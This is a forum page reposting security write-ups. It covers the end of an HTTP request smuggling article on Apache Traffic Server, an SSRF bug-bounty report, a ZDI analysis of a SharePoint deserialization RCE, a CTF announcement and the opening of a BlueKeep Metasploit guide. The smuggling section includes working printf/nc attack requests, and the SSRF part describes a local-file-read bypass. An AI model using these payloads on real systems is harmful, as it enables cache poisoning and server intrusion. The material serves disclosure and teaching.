proxies, etc. Things get complex. The easiest attack is to be a chaos generator (defacement like or DOS), fine cache replacement of a target on the other hand requires fine study and a bit of luck. Does this work on port 8001 with HaProxy? well, no, of course. Our header syntax is invalid. You would need to hide the bad query syntax from HaProxy, maybe using another smuggling issue, to hide this bad request in a body. Or you would need a load balancer which does not detect this invalid syntax. Note that in this example the nginx behavior on invalid header syntax (ignore it) is also not standard (and wont be fixed, AFAIK). This invalid space prefix problem is the same issue as Apache httpd in CVE-2016-8743. HTTP Response Splitting: Content-Length Ignored on Cache Hit Still there? Great! Because now is the nicest issue. At least for me it was the nicest issue. Mainly because I've spend a lot of time around it without understanding it. I was fuzzing ATS, and my fuzzer detected issues. Trying to reproduce I had failures, and success on previoulsy undetected issues, and back to step1. Issues you cannot reproduce, you start doubting that you saw it before. Suddenly you find it back, but then no, etc. And of course I was not searching the root cause on the right examples. I was for example triggering tests on bad chunked transmissions, or delayed chunks. It was very a long (too long) time before I detected that all this was linked to the cache hit/cache miss status of my requests. On cache Hit Content-Length header on a GET query is not read. That's so easy when you know it... And exploitation is also quite easy. We can hide a second query in the first query body, and on cache Hit this body becomes a new query. This sort of query will get one response first (and, yes, that's only one query), on a second launch it will render two responses (so an HTTP request Splitting by definition): 01 GET /index.html?cache=zorg42 HTTP/1.1\r\n 02 Host: dummy-host7.example.com\r\n 03 Cache-control: max-age=300\r\n 04 Content-Length: 71\r\n 05 \r\n 06 GET /index.html?cache=zorg43 HTTP/1.1\r\n 07 Host: dummy-host7.example.com\r\n 08 \r\n Line 04 is ignored on cache hit (only after the first run, then), after that line 06 is now a new query and not just the 1st query body. This HTTP query is valid, THERE IS NO invalid HTTP syntax present. So it's quite easy to perform a successful complete Smuggling attack from this issue, even using HaProxy in front of ATS. If HaProxy is configured to use a keep-alive connection to ATS we can fool the HTTP stream of HaProxy by sending a pipeline of two queries where ATS sees 3 queries: Attack schema [ATS HTTP-Splitting issue on Cache hit + GET + Content-Length] Something HaProxy ATS Nginx |--A----------->| | | | |--A----------->| | | | |--A----------->| | | [cache]<--A--------| | | (etc.) <------| | warmup --------------------------------------------------------- | | | | attack |--A(+B)+C----->| | | | |--A(+B)+C----->| | | | [HIT] | * Bug * | |<--A-----------| | * B 'discovered' * |<--A-----------| |--B----------->| | | |<-B------------| | |<-B------------| | [ouch]<-B----------| | | * wrong resp. * | | |--C----------->| | | |<--C-----------| | [R]<--C----------| | rejected First, we need to init cache, we use port 8001 to get a stream HaProxy->ATS->Nginx. printf 'GET /index.html?cache=cogip2000 HTTP/1.1\r\n'\ 'Host: dummy-host7.example.com\r\n'\ 'Cache-control: max-age=300\r\n'\ 'Content-Length: 0\r\n'\ '\r\n'\ |nc -q 1 127.0.0.1 8001 You can run it two times and see that on a second time it does not reach the nginx access.log. Then we attack HaProxy, or any other cache set in front of this HaProxy. We use a pipeline of 2 queries, ATS will send back 3 responses. If a keep-alive mode is present in front of ATS there is a security problem. Here it's the case because we do not use option: http-close on HaProxy (which would prevent usage of pipelines). printf 'GET /index.html?cache=cogip2000 HTTP/1.1\r\n'\ 'Host: dummy-host7.example.com\r\n'\ 'Cache-control: max-age=300\r\n'\ 'Content-Length: 74\r\n'\ '\r\n'\ 'GET /index.html?evil=cogip2000 HTTP/1.1\r\n'\ 'Host: dummy-host7.example.com\r\n'\ '\r\n'\ 'GET /victim.html?cache=zorglub HTTP/1.1\r\n'\ 'Host: dummy-host7.example.com\r\n'\ '\r\n'\ |nc -q 1 127.0.0.1 8001 Query for /victim.html (should be a 404 in our example) gets response for /index.html (X-Location-echo: /index.html?evil=cogip2000). HTTP/1.1 200 OK Server: ATS/7.1.1 Date: Fri, 26 Oct 2018 16:05:41 GMT Content-Type: text/html Content-Length: 120 Last-Modified: Fri, 26 Oct 2018 14:16:28 GMT ETag: "5bd321bc-78" X-Location-echo: /index.html?cache=cogip2000 X-Default-VH: 0 Cache-Control: public, max-age=300 Accept-Ranges: bytes Age: 12 $<html><head><title>Nginx default static page</title></head> <body><h1>Hello World</h1> <p>It works!</p> </body></html> HTTP/1.1 200 OK Server: ATS/7.1.1 Date: Fri, 26 Oct 2018 16:05:53 GMT Content-Type: text/html Content-Length: 120 Last-Modified: Fri, 26 Oct 2018 14:16:28 GMT ETag: "5bd321bc-78" X-Location-echo: /index.html?evil=cogip2000 X-Default-VH: 0 Cache-Control: public, max-age=300 Accept-Ranges: bytes Age: 0 $<html><head><title>Nginx default static page</title></head> <body><h1>Hello World</h1> <p>It works!</p> </body></html> Here the issue is critical, especially because there is not invalid syntax in the attacking query. We have an HTTP response splitting, this means two main impacts: ATS may be used to poison or hurt an actor used in front of it the second query is hidden (that's a body, binary garbage for an http actor), so any security filter set in front of ATS cannot block the 2nd query. We could use that to hide a second layer of attack like an ATS cache poisoning as described in the other attacks. Now that you have a working lab you can try embedding several layers of attacks... That's what the Drain the request body if there is a cache hit fix is about. Just to better understand real world impacts, here the only one receiving response B instead of C is the attacker. HaProxy is not a cache, so the mix C-request/B-response on HaProxy is not a real direct threat. But if there is a cache in front of HaProxy, or if we use several chained ATS proxies... Timeline 2017-12-26: Reports to project maintainers 2018-01-08: Acknowledgment by project maintainers 2018-04-16: Version 7.1.3 with most of the fix 2018-08-04: Versions 7.1.4 and 6.2.2 (officially containing all fixs, and some other CVE fixs) 2018-08-28: CVE announce 2019-09-17: This article (yes, url date is wrong, real date is september) See also Video Defcon 24: HTTP Smuggling Defcon support Video Defcon demos Sursa: https://regilero.github.io/english/security/2019/10/17/security_apache_traffic_server_http_smuggling/
      • 1
      • Upvote
  21. SSRF | Reading Local Files from DownNotifier server Posted on September 18, 2019 by Leon Hello guys, this is my first write-up and I would like to share it with the bug bounty community, it’s a SSRF I found some months ago. DownNotifier is an online tool to monitor a website downtime. This tool sends an alert to registered email and sms when the website is down. DownNotifier has a BBP on Openbugbounty, so I decided to take a look on https://www.downnotifier.com. When I browsed to the website, I noticed a text field for URL and SSRF vulnerability quickly came to mind. Getting XSPA The first thing to do is add http:127.0.0.1:22 on “Website URL” field. Select “When the site does not contain a specific text” and write any random text. I sent that request and two emails arrived in my mailbox a few minutes later. The first to alert that a website is being monitored and the second to alert that the website is down but with the response inside an html file. And what is the response…? Getting Local File Read I was excited but that’s not enough to fetch very sensitive data, so I tried the same process but with some uri schemes as file, ldap, gopher, ftp, ssh, but it didn’t work. I was thinking how to bypass that filter and remembered a write-up mentioning a bypass using a redirect with Location header in a PHP file hosted on your own domain. I hosted a php file with the above code and the same process registering a website to monitor. A few minutes later an email arrived at the mailbox with an html file. And the response was… I reported the SSRF to DownNotifier support and they fixed the bug very fast. I want to thank the DownNotifier support because they were very kind in our communication and allowed me to publish this write-up. I also want to thank the bug bounty hunter who wrote the write-up where he used the redirect technique with the Location header. Write-up: https://medium.com/@elberandre/1-000-ssrf-in-slack-7737935d3884 Sursa: https://www.openbugbounty.org/blog/leonmugen/ssrf-reading-local-files-from-downnotifier-server/
      • 1
      • Upvote
  22. CVE-2019-1257: Code Execution on Microsoft SharePoint Through BDC Deserialization September 19, 2019 | The ZDI Research Team SUBSCRIBE Earlier this year, researcher Markus Wulftange (@mwulftange) reported a remote code execution (RCE) vulnerability in Microsoft SharePoint that ended up being patched as CVE-2019-0604. He wasn’t done. In September, three additional SharePoint RCEs reported by Markus were addressed by Microsoft: CVE-2019-1295, CVE-2019-1296, and CVE-2019-1257. This blog looks at that last CVE, also known as ZDI-19-812, in greater detail. This bug affects all supported versions of SharePoint and received Microsoft’s highest Exploit Index rating, which means they expect to see active attacks in the near future. Vulnerability Details The Business Data Connectivity (BDC) Service in Microsoft SharePoint 2016 is vulnerable to arbitrary deserialization of XmlSerializer streams due to arbitrary method parameter types in the definition of custom BDC models. As shown by Alvaro Muñoz & Oleksandr Mirosh in their Black Hat 2017 talk [PDF], arbitrary deserialization of XmlSerializer streams can result in arbitrary code execution. SharePoint allows the specification of custom BDC models using the Business Data Connectivity Model File Format (MS-BDCMFFS) data format. Part of this specification is the definition of methods and parameters. Here is an example excerpt, as provided by Microsoft: This defines a method named GetCustomer that wraps a stored procedure named sp_GetCustomer (see RdbCommandText property). Both the input parameters (Direction="In") and return parameters (Direction="Return") get defined with their respective type description. In the example shown above, the input parameter has a primitive type of System.Int32, which is safe. The problem occurs if a BDC model is defined that has a parameter of type Microsoft.BusinessData.Runtime.DynamicType. This would be done to allow the caller flexibility to pass many different types of values for that parameter. The result is deserialization of an arbitrary XmlSerializer stream provided by the caller. The Exploit This vulnerability was tested on Microsoft SharePoint Server 2016 with KB4464594 installed. It was running on top of the 64-bit version of Windows Server 2016 update 14393.3025. In order to demonstrate exploitation, these steps are required: 1: An administrator must define a custom BDC model that includes a method with a parameter with type Microsoft.BusinessData.Runtime.DynamicType. For the custom BDC model, the Database Model example was used as a template and heavily reduced: 2: The administrator must then upload the BDC model via the SharePoint Central Administration | Application Management | Manage service applications | Business Data Connectivity Service. Alternatively, this can also be accomplished via PowerShell: 3: The attacker can then invoke the method, passing a payload in the parameter. On the SharePoint server, you will find that two instances of cmd.exe and one instance of win32calc.exe have been spawned, running as the identity of the SharePoint application pool. To see the path through the code, attach a debugger to w3wp.exe for the SharePoint application. Setting a break point at System.Web.dll!System.Web.UI.ObjectStateFormatter.Deserialize reveals the following call stack: Conclusion Successful exploitation of this won’t get you admin on the server, but it will allow an attacker to execute their code in the context of the SharePoint application pool and the SharePoint server farm account. According to Microsoft, they addressed this vulnerability in their September patch by correcting how SharePoint checks the source markup of application packages. Thanks again to Markus for this submission, and we hope to see more reports from him in the future. The September release also included a patch to fix a bug in the Azure DevOps (ADO) and Team Foundation Server (TFS) that could allow an attacker to execute code on the server in the context of the TFS or ADO service account. We’ll provide additional details of that bug in the near future. Until then, follow the team for the latest in exploit techniques and security patches. Sursa: https://www.zerodayinitiative.com/blog/2019/9/18/cve-2019-1257-code-execution-on-microsoft-sharepoint-through-bdc-deserialization
  23. Cand o sa am timp o sa fac curatenie (fara sa mai tin cont de vechimea si utilitatea userilor care fac caterinca si injura). Desi nu e cea mai buna intrebare, dati voi dovada de inteligenta si oferiti un raspuns din care sa inteleaga cum functioneaza lucrurile.
  24. Bitdefender is proud to announce PwnThyBytes Capture The Flag – our competitive ethical hacking contest September 17, 2019 2 Min Read We hope you’ve all enjoyed your summer holidays, chilling out on the beach, seeing new places and recharging your batteries. Because this autumn we’ve prepared the first edition of PwnThyBytes CTF, a top-notch global computer security competition, which we hope will be a fun and challenging experience for everybody. The contest starts on September 28th and we’re hyped to give you a sneak peek at what to expect. Information security competitions, such as capture the flag (CTF) contests, have surged in popularity during the past decade. Think of them almost like e-sports for ethical hacking. In line with our mission to safeguard users’ data, we at Bitdefender host this event to bring together some of the most skilled teams around the world in areas such as Reverse Engineering, Binary Exploitation, Web Application Auditing, Computer Forensics Investigation, and Cryptography. We extend a warm invitation to everyone connected to or interested in computer security. Build up a team of friends or seasoned professionals, or even have at it by yourself if that’s your thing. Pit yourselves against the most seasoned security professionals on the CTF scene. Enjoy the experience of displaying your techniques, learning new skills, competing with kindred spirits, all for the chance of claiming the rewards and the glory that comes with them. Do you like delving deep into programs, websites, and anything related to computers? Do you like challenging yourself for the pleasure of improvement? Do you want to see just how good you are compared to the rest? If any of these questions strikes a nerve, click here to register. We look forward to seeing you showcase your skills! What do I need to know? Some skills/knowledge you’ll need throughout the competition: Systems programming and OS internals (Linux, Windows), executable formats knowledge (ELF, PE) Reverse Engineering: anti-reverse techniques, anti-debugging techniques, packers, obfuscation, kernel modules Architectures: X86, X86_64, ARM, Web Assembly Vulnerability analysis and exploitation of binaries Web Application Auditing Computer forensics Investigation: memory forensics, software defined radio, file system forensics Cryptography: symmetric, asymmetric, post-quantum schemes and general math skills Graph algorithms What are the prizes? 1st place: 2,048 € 2nd place: 1,024 € 3rd place: 512 € Sursa: https://labs.bitdefender.com/2019/09/bitdefender-is-proud-to-announce-pwnthybytes-capture-the-flag-our-competitive-ethical-hacking-contest/
      • 3
      • Upvote
  25. How to Exploit BlueKeep Vulnerability with Metasploit Sep 10, 2019 • Razvan Ionescu, Stefan Bratescu, Cristin Sirbu In this article we show our approach for exploiting the RDP BlueKeep vulnerability using the recently proposed Metasploit module. We show how to obtain a Meterpreter shell on a vulnerable Windows 2008 R2 machine by adjusting the Metasploit module code (GROOMBASE and GROOMSIZE values) because the exploit does not currently work out-of-the-box. Further on, we explain the steps we took to make the module work properly on our target machine: Background Prerequisites Installing the Bluekeep exploit module in Metasploit Preparing the target machine Adjusting the BlueKeep exploit Running the exploit module Conclusions 1. Background BlueKeep is a critical Remote Code Execution vulnerability in Microsoft’s RDP service. Since the vulnerability is wormable, it has caught a great deal of attention from the security community, being in the same category with EternalBlue MS17-010 and Conficker MS08-067. You can read an in-depth analysis of the BlueKeep vulnerability on our blog post. A few days ago, a Metasploit contributor - zerosum0x0 - has submitted a pull request to the framework containing an exploit module for BlueKeep(CVE-2019-0708). The Rapid7 team has also published an article about this exploit on their blog. As of now, the module is not yet integrated into the main Metasploit branch (it’s still a pull request) and it only targets Windows 2008 R2 and Windows 7 SP1, 64-bit versions. Furthermore, the module is now ranked as Manual since the user needs to provide additional information about the target, otherwise it risks of crashing it with BSOD Articol complet: https://pentest-tools.com/blog/bluekeep-exploit-metasploit/
      • 1
      • Upvote
×
×
  • Create New...